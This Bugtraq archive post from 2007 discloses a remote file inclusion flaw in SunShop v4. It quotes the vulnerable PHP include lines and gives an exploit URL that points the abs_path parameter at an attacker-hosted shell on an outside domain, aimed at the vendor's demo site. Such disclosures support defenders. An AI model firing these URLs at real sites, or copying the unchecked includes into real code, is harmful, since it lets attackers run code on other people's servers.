Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

sunshop v4 >> RFI

From: info () hackerz ir
Date: 25 Apr 2007 15:38:16 -0000
vendor : turnkeywebtools.com
by : s3rv3r_hack3r ( alijsb () yahoo com )
bugz:
++++++++++++++++++++
include/payment/payflow_pro.php > 
include $abs_path."/include/payment/payflow_pro/pfpro.class.php";
++++++++++++++++++++
global.php
require_once $abs_path."/libsecure.php";
++++++++++++++++++++
libsecure.php
include $abs_path . '/admin/config.php';
++++++++++++++++++++
EXploit : file.php?abs_path=http://shell
for example :
http://demos.turnkeywebtools.com/ss4/include/payment/payflow_pro.php?abs_path=http://www.hackerz.ir/?
Previous By Date Next
Previous By Thread Next

Current thread: